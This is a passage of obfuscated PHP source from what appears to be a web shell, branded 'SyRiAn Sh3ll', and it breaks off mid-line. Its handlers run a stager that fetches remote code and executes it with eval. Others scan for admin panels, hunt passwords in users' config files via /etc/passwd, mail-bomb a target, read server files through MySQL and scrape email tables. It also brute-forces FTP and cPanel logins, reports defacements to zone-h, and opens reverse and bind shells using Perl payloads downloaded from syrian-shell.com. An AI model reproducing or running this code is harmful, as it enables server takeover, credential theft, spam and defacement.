ini_restore("safe_mode");
ini_restore("open_basedir");
    '); if($iOIOi1l01liIIol1){echo "[+] \151\x6e\151.\x70\x68p \x48a\163 \102\x65\x65\x6e \x47\x65\x6e\145\162a\164e\144 S\165\x63ces\x73fully";} else {echo "[-] \106\x61\151l\145\x64 to \x67\145n\x65\x72\x61t\145 \151\156\151.\160h\x70 fi\154\x65 !! ";} }  
 
 
 
else if($_POST['read'] || $_POST['show']) { $file = $_POST['file']; $file = str_replace('\\\\','\\',$file); $file = str_replace('//','/',$file); if($_POST['read']){iioiio0iiI0loioo($file);} elseif($_POST['show']){iOiIliO1iIoii1il($file);} }  
 
 
else if($_POST['metaConnect']) { $ip = $_POST['ip']; $port = $_POST['port']; if ($ip == "" && $port == ""){echo "P\154\x65\x61se \146\151\x6cl IP \x41\144\162es\163 & \124h\145 \x6c\151s\164\145\156 Po\162t";} else { $i0li1oio1lO0I0oO = $ip; $port = $port; if (FALSE !== strpos($i0li1oio1lO0I0oO, ":")) {$i0li1oio1lO0I0oO = "[". $i0li1oio1lO0I0oO ."]";} if (is_callable('stream_socket_client')) { $iliillOo0001IIii = stream_socket_client("\164\x63\x70://{$i0li1oio1lO0I0oO}:{$port}"); if (!$iliillOo0001IIii){die();} $iil01ioO0OlOIIOO = 'stream'; } elseif (is_callable('fsockopen')) { $iliillOo0001IIii = fsockopen($i0li1oio1lO0I0oO,$port); if (!$iliillOo0001IIii) {die(); } $iil01ioO0OlOIIOO = 'stream'; } elseif (is_callable('socket_create')) { $iliillOo0001IIii = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); $i0IoililO0ooIl01 = socket_connect($iliillOo0001IIii, $i0li1oio1lO0I0oO, $port); if (!$i0IoililO0ooIl01) {die(); } $iil01ioO0OlOIIOO = 'socket'; } else {die();} switch ($iil01ioO0OlOIIOO) { case 'stream': $len = fread($iliillOo0001IIii, 4); break; case 'socket': $len = socket_read($iliillOo0001IIii, 4); break; } if (!$len) {die();} $a = unpack("\116\154\145\156", $len); $len = $a['len']; $iI1Iio1l0OIIOI0l = ''; while (strlen($iI1Iio1l0OIIOI0l) < $len) { switch ($iil01ioO0OlOIIOO) { case 'stream': $iI1Iio1l0OIIOI0l .= fread($iliillOo0001IIii, $len-strlen($iI1Iio1l0OIIOI0l)); break; case 'socket': $iI1Iio1l0OIIOI0l .= socket_read($iliillOo0001IIii, $len-strlen($iI1Iio1l0OIIOI0l)); break; } } eval($iI1Iio1l0OIIOI0l); echo "
[*] Co\x6e\x6e\x65cti\157n T\145r\x6d\151\x6e\x61t\145\x64"; die(); } }  
 
 
if (isset($_POST["\x73\165bm\151\x74_\154\x6fl"])) { set_time_limit(0); $url = $_POST['hash_lol']; echo "\x54\145s\x74\x69\156\147 ".$url."\n"; $extention = $_POST['extention']; $iol0l0o0olIiO101 = array( "admin/", "\x77\160-admin/", "\141d\x6d\151n\x69s\x74r\141\164\151\x6fn/", "adm\151n\x69st\x72\x61\164\157r/", "mo\144\145\162a\x74or/", "w\145\142\141dmi\x6e/", "\141dmi\156a\162\x65\x61/", "\x62\x62-admin/", "\x61d\x6d\x69n\114o\x67\151n/", "a\144\155in_a\x72\145\141/", "\x70\141\156el-\141dm\151\156ist\x72\x61\x63io\156/", "ins\x74\x61\144min/", "\x6d\x65\x6dber\x61\144\155i\x6e/", "ad\155\151\156\151\x73\x74r\x61t\157\162l\x6fgi\x6e/", "ad\155/", "\x73\151\164e\x61\144\x6d\x69\156/login".$extention."", "admin/account".$extention."", "admin/index".$extention."", "admin/login".$extention."", "admin/admin".$extention."", "\x61\144\x6d\x69\x6e_\x61re\141/login".$extention."", "\141\x64mi\156_a\162\x65\141/index".$extention."", "admincp/index".$extention."", "\141\144\x6di\x6e\x70\x61\x6eel".$extention."", "\167\145ba\144mi\x6e".$extention."", "w\145\x62\x61dm\151\x6e/index".$extention."", "\x77\x65\x62\141\144min/login".$extention."", "admin/admin_\x6c\157g\x69\156".$extention."", "\x61\x64m\x69\156_\154\x6f\147i\x6e".$extention."", "\160\x61\x6e\145\154-a\144m\151n\x69\163\x74\x72a\x63ion/login".$extention."", "\141d\155\x69\156_\x61\162\145\x61/admin".$extention."", "bb-admin/index".$extention."", "b\142-admin/login".$extention."", "\142\x62-admin/admin".$extention."", "admin/\150\157\x6d\x65".$extention."", "\160\141g\145s/admin/admin-login".$extention."", "admin/admin-login".$extention."", "admin-login".$extention."", "admin/\x61\144\x6din\x4co\x67\x69n".$extention."", "\x68o\x6d\x65".$extention."", "\141\x64\x6d\151\156\141re\141/index".$extention."", "admin/\143\x6f\156t\162\x6f\154p\x61\x6e\145\154".$extention."", "admin".$extention."", "admin/c\160".$extention."", "cp".$extention."", "a\x64m\x69\156p\141\156\x65\154.p\150\x70", "\x6do\x64\x65\x72\x61\164\157\162".$extention."", "\141\x64m\151\x6e\151s\x74\x72\x61\164o\x72/index".$extention."", "\141\144m\151ni\x73t\x72\141\x74\x6f\x72/login".$extention."", "user".$extention."", "\x61\144\x6d\151\156i\x73\x74\x72\x61\164o\x72/account".$extention."", "a\144\155\151\x6e\x69\163\164\162\141\x74\x6f\x72".$extention."", "login".$extention."", "mo\x64\145\x6cs\x65\x61rc\150/login".$extention."", "m\x6f\x64er\x61t\157r/login".$extention."", "p\x61nel-a\144m\x69\156\151s\164r\141\x63io\x6e/admin".$extention."", "a\144\155\x69n\x63on\x74\162\x6fl/login".$extention."", "a\x64\155/index".$extention."", "mo\x64e\x72\141\164\x6fr/admin".$extention."", "account".$extention."", "\x63o\x6e\x74\x72\x6fl\x70\141\x6e\145\154".$extention."", "\x61\x64m\151\x6ec\x6fn\x74\162\x6f\154".$extention."", "w\x65\142\141d\155\x69\156/admin".$extention."", "\141\x64\155\x69n\114o\x67\x69\156".$extention."", "\x70\x61\x6ee\x6c-a\x64\x6di\x6ei\x73\x74r\x61\143i\x6f\156/login".$extention."", "\167p-login".$extention."", "a\x64\155i\156\114o\147i\156".$extention."", "admin/a\x64minL\157\x67\x69\156".$extention."", "a\144m\151n\141re\141/index".$extention."", "\x61\144\x6d\x69\156are\x61/admin".$extention."", "ad\x6d\151n\141\162\145\x61/login".$extention."", "\160\x61n\x65l-\141\x64m\151n\151\163\x74\x72\141cion/index".$extention."", "\x6d\x6f\144\145\x6cse\x61\162\143h/index".$extention."", "\155ode\154s\x65\141\x72\143\150/admin".$extention."", "\x61\x64m/\141\144\155\154oginu\163\145r".$extention."", "\141d\155\154o\147i\156\x75\163\x65\x72".$extention."", "ad\155\x69\156\x32".$extention."", "\x61\x64\x6d\x69\x6e\x32/login".$extention."", "a\144\x6din2/index".$extention."", "ad\155/index".$extention."", "\141\x64m".$extention."", "a\146\146\x69l\x69a\164\145".$extention."", "\141\144\155_auth".$extention."", "\155e\155b\145\x72a\144m\x69n".$extention."", "\x61d\x6di\x6e\x69\163\164ra\x74\x6frl\x6f\147in".$extention.""); foreach ($iol0l0o0olIiO101 as $admin) { $iliIi000o0ioIIi0 = get_headers("$url$admin"); if (eregi('200', $iliIi000o0ioIIi0[0])) {echo "[+] $url$admin  ~ Fou\156\x64!\n";} } }  
 
 
else if($_POST['doAction'] && ($_POST['someAction'] == 'findCon')) { set_time_limit(0); $passwd=fopen('/etc/passwd','r'); if (!$passwd) { echo "[-] E\162\x72\x6fr : c\x6f\165d\156'\164 read /\x65t\143/passwd"; exit; } $i1lo1iol011OI0O0=array(); $users=array(); $i0iOlloi011lIO1o=array(); $i=0; while(!feof($passwd)) { $i00O1OOOo000OIiI=fgets($passwd); if ($i>35) { $pos=strpos($i00O1OOOo000OIiI,":"); $username=substr($i00O1OOOo000OIiI,0,$pos); $i0111ol01loIl1Oi="/\x68\x6fme/$username/p\x75\x62li\x63_\x68tm\154/"; if (($username!="")) { if (is_readable($i0111ol01loIl1Oi)) { array_push($users,$username); array_push($i1lo1iol011OI0O0,$i0111ol01loIl1Oi); } } } $i++; } echo ""; echo "[+] \x46\x6f\x75\x6e\x64\x65d ".sizeof($users)." \145\x6e\164r\x79\x73 \151\x6e /\x65\x74\x63/passwd
"; echo "[+] \x46\x6fu\156\144\145d ".sizeof($i1lo1iol011OI0O0)." \x72ea\144\x61\x62\x6ce pu\142lic_\150\164\155l \x64ir\145\143t\x6fr\151\145s
"; echo "[~] \123\x65\141r\x63\x68\151n\147 \x66\157\162 \160a\163\163\x77\157\162\144\163 i\x6e config.* \x66\151\154e\163...
"; foreach ($users as $user) { $path="/h\157me/$user/\160ub\x6c\151\143_h\x74m\154/"; il0oll1olll0Io1l($path,$user); } echo "[+] \x44\157\x6ee"; }  
 
 
else if($_POST['sendMailStorm']) { $to=$_POST['to']; $nom=$_POST['nom']; $Comments=$_POST['Comments']; if ($to <> "" ) { for ($i = 0; $i < $nom ; $i++) { $from = rand (71,1020000000).""."At\x74a\x63\153e\x72.\x63\x6f\155"; $ioOi1OOooo10oI1o= md5("$from"); if(mail($to,$ioOi1OOooo10oI1o,$Comments,"\106r\x6fm:$from")) echo "[+] $i s\160\x61m\155\x65d !!
"; else {echo "[-] $i \x46\141i\x6c\x65\144 !! 
";} } } }  
 
 
else if($_POST['emailExtractorHelp']) { echo "\x54\x68\x69\163 \x69s \123o\155\145 Ta\x62\154es \x4e\x61\155\x65 & C\x6fl\x75\x6d\x6e\x73 N\141\155\x65 Fo\x72 \x53\157\155\x65 \x46\141\x6d \x53\x63\162ip\x74s ..

[+] \126\x42u\x6c\154\145t\x69\156
\124able-name : user
\143\x6f\154\165\x6d\x6e-name : email

[+] W\x6frd\x50re\163\x73 
\x54\141\x62l\145-name : w\160_u\x73er\x73
\x63\x6flum\156-name : \165\163e\x72_\145m\141i\x6c 

[+] J\157oml\141 
\x54\141\x62le-name : \152o\x73_\x75\163\145r\163
c\157lumn-name : email

[+] \120\110P\x42\102 
\124\141\142\x6ce-name : p\x68p\x62\x62_\x75\x73\145\162\x73
\143ol\165\x6dn-name : \x75\x73\x65r_\x65mai\154

[+] \x49.P.\x42o\141r\144 
\124a\142\x6c\145-name : ib\146_\x6d\x65\x6d\142\x65\162\x73
c\157\x6c\x75m\156-name : email

[+] S\115\106 
T\x61\142\x6ce-name : \x73mf_\155\x65m\142\145\162s
\x63\157\x6c\165\155n-name : e\155\141\151\154\x41\144\x64r\x65s\x73 "; }  
 
 
else if($_POST['MySQLQuery'] && ($_POST['SQLType'] == 'SQLQuery')) { $query = stripslashes($_POST['QU']); iIO0io1IO0OI1lii($_POST['QU_HOST'],$_POST['QU_USER'],$_POST['QU_PASS'],$_POST['QU_DB']); $iIIi1l1OiOi0IO0l = mysql_query($query); $fields = i0IOlii1OIloli0l($iIIi1l1OiOi0IO0l); while ($rows = mysql_fetch_row($iIIi1l1OiOi0IO0l)) { for ($i = 0; $i < sizeof($rows); $i++) { if (is_null($rows[$i])) {$rows[$i] = "[NULL]";} elseif (ereg("^[[:\x73p\x61c\145:]]*$",$rows[$i])) {$rows[$i] = "[NULL]";} else {$rows[$i] = htmlspecialchars($rows[$i]);} echo $rows[$i]."
"; } echo "
      
"; } }  
 
 
else if($_POST['MySQLQuery'] && ($_POST['SQLType'] == 'SQLReader')) { iIO0io1IO0OI1lii($_POST['QU_HOST'],$_POST['QU_USER'],$_POST['QU_PASS'],$_POST['QU_DB']); $iO0li0OOi10o0Iil = uniqid('N'); $file = str_replace('\\\\','\\',$_POST['file']); $query = array( "\103RE\x41\124\x45 \x54EM\x50\x4f\122\x41\122\131 T\101\102L\x45 $iO0li0OOi10o0Iil (\146\151\x6c\145 \114O\x4e\107\102L\x4f\x42)", "\x4c\x4f\101\104 \x44\101\x54\x41 \111\116FI\114E '".mysql_real_escape_string($file)."' \x49\x4eTO TA\x42\114E $iO0li0OOi10o0Iil", "\123\x45\x4c\105\103T * FROM $iO0li0OOi10o0Iil" ); foreach($query as $iI1IoIolO0OI0OII) { $mysqlQuery = mysql_query($iI1IoIolO0OI0OII,$connect); while($line = mysql_fetch_row($mysqlQuery)) echo htmlspecialchars($line[0]); echo "
"; } }  
 
 
else if($_POST['MySQLQuery'] && ($_POST['SQLType'] == 'EmailExtractor')) { iIO0io1IO0OI1lii($_POST['QU_HOST'],$_POST['QU_USER'],$_POST['QU_PASS'],$_POST['QU_DB']); $iOiii01iii0Ioi0I = $_POST['EM_TABLE']; $i10I1o1llOiIiOol = $_POST['EM_COLUMN']; $sql = mysql_query("\123\x45\x4cE\x43\x54 * FROM $iOiii01iii0Ioi0I"); while($i0IoililO0ooIl01 = mysql_fetch_array($sql)) {echo ''.$i0IoililO0ooIl01["$i10I1o1llOiIiOol"].'
';} }  
 
 
else if($_POST['editFileSubmit']) { $fileName = stripslashes($_POST['editFile']); chdir(stripslashes($_POST['currentPath'])); if(!file_exists($fileName)){echo "[-] \x53\x68it ! W\x68\145r\145 \x69\x73 \164he \106\151\154\145 ? \n[+] \x4e\157\167 y\157\165 \x63a\x6e write \x74h\x65 n\145\167 \x66\151\154e content ";} else{ if($_POST['actionType'] == 'edit'){echo htmlspecialchars(file_get_contents($fileName));} else if($_POST['actionType'] == 'rename'){rename($fileName,$_POST['newName']);} else if($_POST['actionType'] == 'copy'){copy($fileName,$_POST['newName']);} else if($_POST['actionType'] == 'deleteFile'){DeleteFile($fileName);} else if($_POST['actionType'] == 'deleteFolder'){DeleteFolder($fileName);} else if($_POST['actionType'] == 'createFile'){iii0li0iIOii1III($fileName,$_POST['newName']);} else if($_POST['actionType'] == 'createFolder'){mkdir($fileName);} else if($_POST['actionType'] == 'zip'){iOIoi1lOOI00I10I($fileName,getcwd()); } else if($_POST['actionType'] == 'unzip'){UnZip($fileName,getcwd());} else if($_POST['actionType'] == 'tar'){ Exe('tar -zcf '.$fileName." ".$fileName);} else if($_POST['actionType'] == 'untar'){ Exe ('tar -zxf '.$fileName);} else if($_POST['actionType'] == 'gz'){Exe('tar -czvf '.$fileName." ".$fileName);} else if($_POST['actionType'] == 'ungz'){Exe('gzip -d '.$fileName);} } } else if($_POST['saveEditedFile']) { chdir(stripslashes($_POST['currentPath'])); $ioillo0oioi0lIiI = iii0li0iIOii1III($_POST['file2edit'],$_POST['ExecutionArea']); if($ioillo0oioi0lIiI){echo "[+] \x46\x69\154\x65 \x53a\x76\x65d !";} else {echo "[-] F\141\x69led T\x6f Sa\x76e \106\x69\x6ce !!";} }  
 
 
else if($_POST['SendNowToZoneH']) { ob_start(); $iiIoloOoo0OlOIlI = get_loaded_extensions(); if(!in_array("curl", $iiIoloOoo0OlOIlI)){die('[-] Curl Is Not Supported !! ');} $hacker = $_POST['defacer']; $method = $_POST['hackmode']; $il1Iiio010o1I0il = $_POST['reason']; $site = $_POST['domain']; if (empty($hacker)){die ("[-] \131o\165 \115u\x73t \x46i\x6c\x6c t\x68\145 \x41t\x74\141\x63\x6b\x65\162 name !");} elseif($method == "--------S\105L\105\x43\x54--------") {die("[-] \x59\157u \115\x75\x73\164 \x53\x65le\x63\164 T\150\145 M\145t\150\157\x64 !");} elseif($il1Iiio010o1I0il == "--------\x53E\114EC\x54--------") {die("[-] \131\x6fu \115\x75\163\164 \x53e\154\x65\143t \x54h\x65 \x52\145\x61\163\157\x6e");} elseif(empty($site)) {die("[-] \131\157u \115\165\163t \111\x6et\145\162 the S\x69\x74e\163 \114\151\x73t ! ");} $i = 0; $sites = explode("\n", $site); while($i < count($sites)) { if(substr($sites[$i], 0, 4) != "h\x74\x74\160") {$sites[$i] = "\x68\x74tp://".$sites[$i];} i1ol1ilOlIoIOOII("h\x74\164\x70://\x7a\157\156\145-\150.org/\156o\x74\151\x66y/\x73\151ng\x6c\x65", $hacker, $method, $il1Iiio010o1I0il, $sites[$i]); echo "\x53\x69t\145 : ".$sites[$i]." D\x65f\x61c\145d !\n"; ++$i; } echo "[+] Send\151\156g \x53i\164\145\x73 To Zo\x6ee-\x48 H\141s B\x65e\x6e Com\x70l\x65t\145\144 \123\165\143\143es\163\146\165\x6cl\171 !! "; }  
 
 
else if($_POST['BruteForceCpanelAndFTP']) { $iIlIlii0OOIiiOo0=5; set_time_limit(0); $submit = $_REQUEST['BruteForceCpanelAndFTP']; $users = $_REQUEST['users']; $pass = $_REQUEST['passwords']; $target = $_REQUEST['target']; $cracktype = $_REQUEST['cracktype']; if(empty($target)){$target = "127.0.0.1";} function iO1li1i0looIiOil($host,$user,$pass,$timeout) { $i0o1iOil1oIoI0I1 = curl_init(); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_URL, "ftp://$host"); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_RETURNTRANSFER, 1); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_FTPLISTONLY, 1); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($i0o1iOil1oIoI0I1, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_FAILONERROR, 1); $data = curl_exec($i0o1iOil1oIoI0I1); if ( curl_errno($i0o1iOil1oIoI0I1) == 28 ) { print "\x45r\x72o\x72 : \103\x6f\156\156\145\143t\x69\157\x6e \x54im\145\x6f\165t \120lea\x73e \103\x68\x65\x63k \x54h\145 \x54\x61r\x67\x65\x74 H\x6f\163t\156\x61\x6d\145 ."; exit; } elseif ( curl_errno($i0o1iOil1oIoI0I1) == 0 ){print "[+] \x43\x72\141\x63\153\151\x6eg \123u\x63\x63\x65\x73\163 \127i\164\150 Username ($user) \x61\x6ed \120\x61\163\x73\x77\x6f\162\x64 ($pass)";} curl_close($i0o1iOil1oIoI0I1); } function i10l1llOi0IOliIl($host,$user,$pass,$timeout) { $i0o1iOil1oIoI0I1 = curl_init(); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_URL, "\x68\164\164\x70://$host:2082"); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_RETURNTRANSFER, 1); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($i0o1iOil1oIoI0I1, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_FAILONERROR, 1); $data = curl_exec($i0o1iOil1oIoI0I1); if ( curl_errno($i0o1iOil1oIoI0I1) == 28 ) { print "[-] \103\x6fn\x6e\145\143\x74\151o\x6e T\151\x6d\x65\157u\164 Ple\x61\x73\145 \x43h\145\143\153 Th\x65 \x54\141\162\147\145t \110os\x74n\141\x6de ."; exit; } elseif ( curl_errno($i0o1iOil1oIoI0I1) == 0 ){print "[+] \103\x72\141c\153in\147 \x53ucc\x65\163\x73 \x57i\164\x68 Username ($user) \141\156\144 \120a\163s\x77\157rd ($pass)";} curl_close($i0o1iOil1oIoI0I1); } if(isset($submit) && !empty($submit)) { if(empty($users) && empty($pass)){ print "[-] \120\x6c\145a\x73\145 C\150\145ck T\x68\145 Users \x6f\x72 \x50as\163\x77\157r\x64 \114\x69\x73t \x45\x6et\162\171 . . .";} if(empty($users)){ print "[-] \x50\154\x65a\x73\x65 C\x68\145\143k Th\x65 Users Lis\x74 E\156\x74\x72y . . ."; } if(empty($pass)){ print "[-] \x50le\141\x73\x65 C\150\145ck T\150\x65 \x50\x61\163\163\167\x6f\x72\144 \114\151\x73t \105n\x74\162y . . ";} $iOl0looOiioliIll=explode("\n",$users); $i1l01iO1oiOiI100=explode("\n",$pass); print "[~]# C\x72a\143k\151\156\147 \x50\162\157c\145\163\163 \123\164\141\x72\x74\145d, \x50\154\145\141s\145 W\x61\151t ..."; foreach ($iOl0looOiioliIll as $user) { $ilIliil0l0o1I0l1 = trim($user); foreach ($i1l01iO1oiOiI100 as $password ) { $iliIll1Oi0O0IIll = trim($password); if($cracktype == "ftp") { iO1li1i0looIiOil($target,$ilIliil0l0o1I0l1,$iliIll1Oi0O0IIll,$iIlIlii0OOIiiOo0); } if ($cracktype == "\x63pa\x6e\x65\154") { i10l1llOi0IOliIl($target,$ilIliil0l0o1I0l1,$iliIll1Oi0O0IIll,$iIlIlii0OOIiiOo0); } } } } }  
 
 
else if($_POST['backconn']) { set_time_limit (0); $ip = trim($_POST['ip']); $port = trim($_POST['backport']); $back_pass = trim($_POST['back_pass']); iloOl1lloloI1loI('http://www.syrian-shell.com/cgi/compiler.zip'); UnZip('compiler.zip',getcwd()); DeleteFile('compiler.zip'); iI11i0Il0iO0iooi("compiler",0777); echo "[~] \165\x73\x65 \164\x68is \x43\157\x6d\x6d\x61n\x64 \x69n \116\145\164\103a\164 : \156\143 -\166\154p [Y\157ur \x50OR\x54]"; if($_POST['use'] == 'php1') { $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if($sock < 0){die("[-] \146\141i\154\145\x64 to \x63\x72\x65\x61\164\145 socket.");} $result = socket_connect($sock, $ip, $port); if($result < 0){die("[-] \146\x61i\x6c\x65\144 to connect \142a\x63k to host:".$_GET['host']);} $i01O1l1ilooiI10O = "\n\n -== S\x79\x52\151A\x6e \x53h\x33l\x6c , \x42a\x63k \103on\156\145c\x74io\156 ==-\n$"; socket_write($sock, $i01O1l1ilooiI10O, strlen($i01O1l1ilooiI10O)); while($input = socket_read($sock, 10000)) { $result = `$input`; $result .= "\n$ "; socket_write($sock, $result, strlen($result)); } } else if ($_POST['use'] == 'php2') { $iOIliloO0iIo11Ol = 1400; $iliO10o1oO0l1IIo = null; $i000iiO0iOoI0OIl = null; $shell = 'uname -a; w; id; /bin/sh -i'; $il0I100001iI00O1 = 0; $i110lOol1i0IOOIo = 1; if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { printit("[-] E\x52\x52\117\x52: \x43an'\x74 \146or\x6b"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("[-] E\162\x72\x6fr: Ca\156't \163\x65\164\x73\x69\144()"); exit(1); } $il0I100001iI00O1 = 1; } else { printit("[-] WARN\x49\116\107: \x46ai\x6ce\144 to \144\141\x65\x6d\157\x6e\x69\163e.  \124\150\x69\163 is \161u\x69\x74\145 c\x6f\x6d\x6d\157n an\144 \x6e\157\x74 \x66a\x74al."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $il1Oi1OoO11I1OiI, $i1Oli10olOiIlloI, 30); if (!$sock) { printit("$i1Oli10olOiIlloI ($il1Oi1OoO11I1OiI)"); exit(1); } $i0ii10l00loI0IiI = array( 0 => array("p\x69\x70e", "r"), 1 => array("\160\151\x70\x65", "\167"), 2 => array("\x70ipe", "w") ); $process = proc_open($shell, $i0ii10l00loI0IiI, $ilOIi1011iloIl1I); if (!is_resource($process)) { printit("[-] \x45\122\x52OR: \103\x61\156't \163\160a\x77\x6e shell"); exit(1); } stream_set_blocking($ilOIi1011iloIl1I[0], 0); stream_set_blocking($ilOIi1011iloIl1I[1], 0); stream_set_blocking($ilOIi1011iloIl1I[2], 0); stream_set_blocking($sock, 0); printit("[+] \x53\x75\x63\143\x65\163\163\x66\165\x6c\154y o\x70e\156e\144 r\145\166\145rs\x65 shell to $ip:$port"); while (1) { if (feof($sock)) { printit("[-] E\x52\x52O\x52: \x53h\145l\154 \143\x6f\x6e\x6e\145\143ti\157\x6e \164\145r\155i\x6e\x61te\144"); break; } if (feof($ilOIi1011iloIl1I[1])) { printit("[-] \x45R\122\117\122: \123\x68\145\154\154 process \164\145\x72mi\x6ea\x74ed"); break; } $i1IIi11O1iOiI010 = array($sock, $ilOIi1011iloIl1I[1], $ilOIi1011iloIl1I[2]); $iiOol1oOii0OIilO = stream_select($i1IIi11O1iOiI010, $iliO10o1oO0l1IIo, $i000iiO0iOoI0OIl, null); if (in_array($sock, $i1IIi11O1iOiI010)) { if ($i110lOol1i0IOOIo) printit("\x53\x4f\103\x4b \122EA\x44"); $input = fread($sock, $iOIliloO0iIo11Ol); if ($i110lOol1i0IOOIo) printit("S\117\x43\x4b: $input");
fwrite($ilOIi1011iloIl1I[0], $input); } if (in_array($ilOIi1011iloIl1I[1], $i1IIi11O1iOiI010)) { if ($i110lOol1i0IOOIo) printit("\123\124\x44\117UT R\x45A\x44"); $input = fread($ilOIi1011iloIl1I[1], $iOIliloO0iIo11Ol); if ($i110lOol1i0IOOIo) printit("\123\124\104O\125\124: $input"); fwrite($sock, $input); } if (in_array($ilOIi1011iloIl1I[2], $i1IIi11O1iOiI010)) { if ($i110lOol1i0IOOIo) printit("\123\124D\105\122R \x52EA\104"); $input = fread($ilOIi1011iloIl1I[2], $iOIliloO0iIo11Ol); if ($i110lOol1i0IOOIo) printit("\123TDE\x52R: $input"); fwrite($sock, $input); } } fclose($sock); fclose($ilOIi1011iloIl1I[0]); fclose($ilOIi1011iloIl1I[1]); fclose($ilOIi1011iloIl1I[2]); proc_close($process); } else if ($_POST['use'] == "p\150\x70\063-\167\151\156") { $i0Oll100O0OIiIli=array('path' => 'c:\\windows\\system32'); $i0ii10l00loI0IiI = array( 0 => array("\160\x69pe","\x72"), 1 => array("p\151\x70e","\167"), 2 => array("\x66\x69l\x65","l\x6fg.t\170\x74","a")); } else if ($_POST['use'] == "\x70h\160\x33-\154\x69n\165x") { $i0Oll100O0OIiIli = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin'); $i0ii10l00loI0IiI = array( 0 => array("p\x69\160\x65","r"), 1 => array("\x70i\x70\145","w"), 2 => array("f\x69\x6ce","/tmp/\154\157\147.\164\170\x74","a")); } if (($_POST['use'] == "ph\x703-\154\x69n\165x") || ($_POST['use'] == "ph\160\x33-\167\x69\x6e")) { $ioO1lliO0110I0io=getprotobyname("t\x63\x70"); if(($sock=socket_create(AF_INET,SOCK_STREAM,$ioO1lliO0110I0io))<0) { die("[-] Soc\x6b\145\x74 \103r\145a\164\x65 F\141\151\154e");} if(($iIl0ll1lo0l0I1IO=socket_connect($sock,$ip,$port))<0) { die("[-] \x43on\156\x65\143\x74 \x46\x61il\145");} else{ $message="----------------------\120H\x50 \x43\x6f\x6en\x65\x63t-B\141\x63k--------------------\n"; $message.="----------------------- \123\x79R\151\101\156 \x53h\063\154l --------------------\n"; socket_write($sock,$message,strlen($message)); $iolilOoo01OIoIo1=str_replace('\\','/',dirname(__FILE__)); while($cmd=socket_read($sock,65535,$ioO1lliO0110I0io)) { if(trim(strtolower($cmd))=="\x65x\x69t"){socket_write($sock,"\102ye \102ye\n");exit;} else{ $process = proc_open($cmd, $i0ii10l00loI0IiI, $ilOIi1011iloIl1I, $iolilOoo01OIoIo1, $i0Oll100O0OIiIli); if (is_resource($process)) { fwrite($ilOIi1011iloIl1I[0], $cmd); fclose($ilOIi1011iloIl1I[0]); $msg=stream_get_contents($ilOIi1011iloIl1I[1]); socket_write($sock,$msg,strlen($msg)); fclose($ilOIi1011iloIl1I[1]); $iiiO1lli0OllIl0O = proc_close($process);} } } } } else if ($_POST['use'] == 'perl1') { iloOl1lloloI1loI('http://syrian-shell.com/back/perl1.zip'); UnZip('perl1.zip',getcwd()); DeleteFile('perl1.zip'); iI11i0Il0iO0iooi('perl1.sy3',0755); Exe('perl perl1.sy3 '.$ip." ".$port); } else if ($_POST['use'] == 'perl2') { iloOl1lloloI1loI('http://syrian-shell.com/back/perl2.zip'); UnZip('perl2.zip',getcwd()); DeleteFile('perl2.zip'); iI11i0Il0iO0iooi('perl2.sy3',0755); Exe('perl perl2.sy3 '.$ip." ".$port." ".$back_pass); } else if ($_POST['use'] == 'perl3-linux') { iloOl1lloloI1loI('http://syrian-shell.com/back/back3-linux.zip'); UnZip('back3-linux.zip',getcwd()); DeleteFile('back3-linux.zip'); iI11i0Il0iO0iooi('back3-linux.sy3',0755); Exe('perl back3-linux.sy3 '.$ip." ".$port); } else if ($_POST['use'] == 'perl4-win') { iloOl1lloloI1loI('http://syrian-shell.com/back/back4-win.zip'); UnZip('back4-win.zip',getcwd()); DeleteFile('back4-win.zip'); iI11i0Il0iO0iooi('back4-win.sy3',0755); Exe('perl back4-win.sy3 '.$ip." ".$port); }
else if ($_POST['use'] == 'php4') {ilII1oOlIo10I0oi('cb', "", $port, $ip);} else if ($_POST['use'] == 'c1') {i1O11101l1IllolO('/tmp', 'gcc', $ip , $port); } }  
 
 
else if($_POST['bind']) { set_time_limit (0); $i0oI1OlOO0II0o00 = trim($_POST['bind_pass']); $port = trim($_POST['port']); iloOl1lloloI1loI('http://www.syrian-shell.com/cgi/compiler.zip'); UnZip('compiler.zip',getcwd()); DeleteFile('compiler.zip'); iI11i0Il0iO0iooi("compiler",0777); echo "[~] \165\163\x65 t\150i\163 \103\157\x6d\155a\156\x64 \x69\156 \x4ee\164\103at : n\x63 ñv ñn [\123\145\x72\x76\145\162 ip] [port]"; if($_POST['use'] == 'php1') { $i0lll1o0olioIlOI = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); socket_bind($i0lll1o0olioIlOI,'127.0.0.1', $port) or die('[-] Could not bind to address'); socket_listen($i0lll1o0olioIlOI, 5); $iooIil00loIOOIii = socket_accept($i0lll1o0olioIlOI); $input = socket_read($iooIil00loIOOIii, 1024); echo $input; socket_close($iooIil00loIOOIii); socket_close($i0lll1o0olioIlOI); } else if ($_POST['use'] == 'perl1-linux') { iloOl1lloloI1loI('http://syrian-shell.com/bind/perl1-linux.zip'); UnZip('perl1-linux.zip',getcwd()); DeleteFile('perl1-linux.zip'); iI11i0Il0iO0iooi('perl1-linux.sy3',0755); Exe('perl perl1-linux.sy3 '.$port." ".$i0oI1OlOO0II0o00); } else if ($_POST['use'] == 'perl2-linux') { iloOl1lloloI1loI('http://syrian-shell.com/bind/perl2-linux.zip'); UnZip('perl2-linux.zip',getcwd()); 